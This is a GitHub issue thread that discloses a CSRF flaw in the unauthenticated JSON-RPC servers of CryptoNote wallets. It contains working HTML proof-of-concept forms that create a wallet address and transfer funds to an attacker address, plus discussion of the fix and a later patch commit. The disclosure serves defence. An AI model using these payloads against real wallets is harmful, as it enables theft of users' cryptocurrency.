Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Unauthenticated JSON-RPC API allows takeover of CryptoNote RPC wallets #172

Open
Ayrx opened this issue Feb 5, 2018 · 16 comments
Open

Unauthenticated JSON-RPC API allows takeover of CryptoNote RPC wallets #172

Ayrx opened this issue Feb 5, 2018 · 16 comments

Comments

@Ayrx
Copy link

Ayrx commented Feb 5, 2018

The reference implementation of CryptoNote wallets start a JSON-RPC server
listening on a localhost port that allows an attacker to execute wallet
functions due to a lack of authentication.

An attacker may exploit this vulnerability to steal cryptocurrency from
vulnerable wallets by directing users to visit a webpage hosting the exploit.

Affected Software

All cryptocurrencies that use the reference CryptoNote walletd and simplewallet
implementations are vulnerable. Notable coins include Bytecoin and Aeon.

Description

The reference CryptoNote repository comes with two different wallets,
simplewallet and walletd. Both wallets have JSON-RPC servers that are
vulnerable to similar attacks. Even though the JSON-RPC servers are listening
on localhost, they can be exploited via CSRF.

walletd

walletd has the JSON-RPC server enabled by default. The wallet binds to port
8070 by default.

The below proof-of-concept demonstrates the vulnerability by creating a new
address in the walletd container.

<html>
<form action=http://127.0.0.1:8070/json_rpc method=post enctype="text/plain" >
	<input name='{"params":{},"jsonrpc":"2.0","method":"createAddress", "ignore_me":"' value='test"}'type='hidden'>
<input type=submit>
</form>
</html>

simplewallet

simplewallet does not have the JSON-RPC server enabled by default. Enabling
the server requires the --rpc-bind-port flag when invoking simplewallet.

The below proof-of-concept demonstrates the vulnerability by making a transfer
from the running wallet to an attacker controlled wallet. Change the
INSERT_AMOUNT and INSERT_WALLET_ADDRESS parameters when testing the POC. We
assume that simplewallet was invoked with --rpc-bind-port 8111.

<html>
<form action=http://127.0.0.1:8111 method=post enctype="text/plain" >
        <input name='{"jsonrpc":"2.0","method":"transfer","params":{"destinations":[{"amount":INSERT_AMOUNT,"address":"INSERT_WALLET_ADDRESS"}],"fee":100,"mixin":0,"unlock_time":0}, "ignore_me":"' value='test"}'type='hidden'>
<input type=submit>
</form>
</html>

Notes on exploitation

While the proof-of-concept code assumes that the server is listening on a
specific port, changing the running port does prevent exploitation. It is
trivial to enumerate open ports with WebSocket.

The proof-of-concept uses a HTML form to demonstrate the attack. However,
exploiting this over Javascript is not an issue due to a lack of CSRF
protection.

Recommended Fix

The JSON-RPC servers should be patched to require authentication on every
request. It is recommended that all forks of CryptoNote and ByteCoin apply
a patch similar to the Turtlecoin fix.

@FndNur1Labs
Copy link

FndNur1Labs commented Feb 5, 2018 via email

@nnamon
Copy link

nnamon commented Feb 5, 2018

For those reading the above, the links are malicious and point to a coinhive miner.

Could at least bother with proper english if they wanted to scam people into browser mining for them.

@FndNur1Labs
Copy link

FndNur1Labs commented Feb 5, 2018 via email

@rainmanp7
Copy link

rainmanp7 commented Feb 6, 2018

cnhv<~doesn't this equate to coin hive miner website?
Then the after mention is your personal account ,to get paid?
.
Does that seem like a legitimate help in your mind?

@Doestoievski
Copy link

@Ayrx Make a pull request.

@FndNur1Labs
Copy link

FndNur1Labs commented Feb 6, 2018 via email

@Ayrx Ayrx changed the title Vulnerability report Unauthenticated JSON-RPC API allows takeover of CryptoNote RPC wallets Feb 12, 2018
@Ayrx
Copy link
Author

Ayrx commented Feb 12, 2018

As there have been no response by an official developer in 7 days, I am publishing the details of this vulnerability. A CVE ID has been requested from MITRE and will be updated here when one is assigned. The same report is duplicated at: https://www.ayrx.me/cryptonote-unauthenticated-json-rpc

@jared201
Copy link

@Ayrx no patch needed, just don't bind the RPC daemon to 0.0.0.0 , use 127.0.0.1 from your web wallet so no external exploitation is possible, Desktop Wallets should be deprecated, they're obsolete. it's really that simple.

@Ayrx
Copy link
Author

Ayrx commented Feb 12, 2018

@jared201 Exploitation is still possible via CSRF even if the daemon is bound only to 127.0.0.1.

@jared201
Copy link

@Ayrx not really, via https, just don't allow unnecessary GET requests coming to your website directly

@FndNur1Labs
Copy link

FndNur1Labs commented Feb 12, 2018 via email

@keylength
Copy link

The 7 day disclosure window and flaming cryptonote gif are a bit much xD

@jared201
Copy link

@keylength

i guess that JSON-RPC "security" issue is not really new, everyone from Monero to Bytecoin guys already knew that, except that they are silent about it.

@FndNur1Labs
Copy link

FndNur1Labs commented Feb 13, 2018 via email

@jared201
Copy link

@FndNur1Labs this issue is really serious if you're offering desktop wallets which MUST do RPC calls via public IP or FQDN. However if you're developing web wallets, all you need is to "harden" your code by not making RPC calls from the client-side javascript, which most browsers will warn or not allow you to. Instead, you should use your JS framework's server-side RPC calls (e.g. Meteor.call() or something similar) , and those RPC calls should only be connecting locally(127.0.0.1). CSRF'ing is nearly impossible, unless you allow a 'router' to do that.

@FndNur1Labs
Copy link

FndNur1Labs commented Feb 13, 2018 via email

aphivantrakul added a commit to cash2/cash2 that referenced this issue Aug 28, 2019
Walletd JSON RPC requests did not require authentication and had the potential for an attacker to gain control of the wallet by sending JSON RPC commands to the wallet via CSRF. Users can now run the Wallet JSON RPC server with the flag --rpc-password to require that all RPC commands include a password.

Thank you to the Turtlecoin developers for their work. Much of this code is borrowed from their commit turtlecoin/turtlecoin@4949e91

More information about this vulnerability can be found here -
https://www.cvedetails.com/cve/CVE-2018-1000093/
cryptonotefoundation#172

This commit is a copyof 2 commits from the master branch of Cash2
1b9691a
f01b904
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

7 participants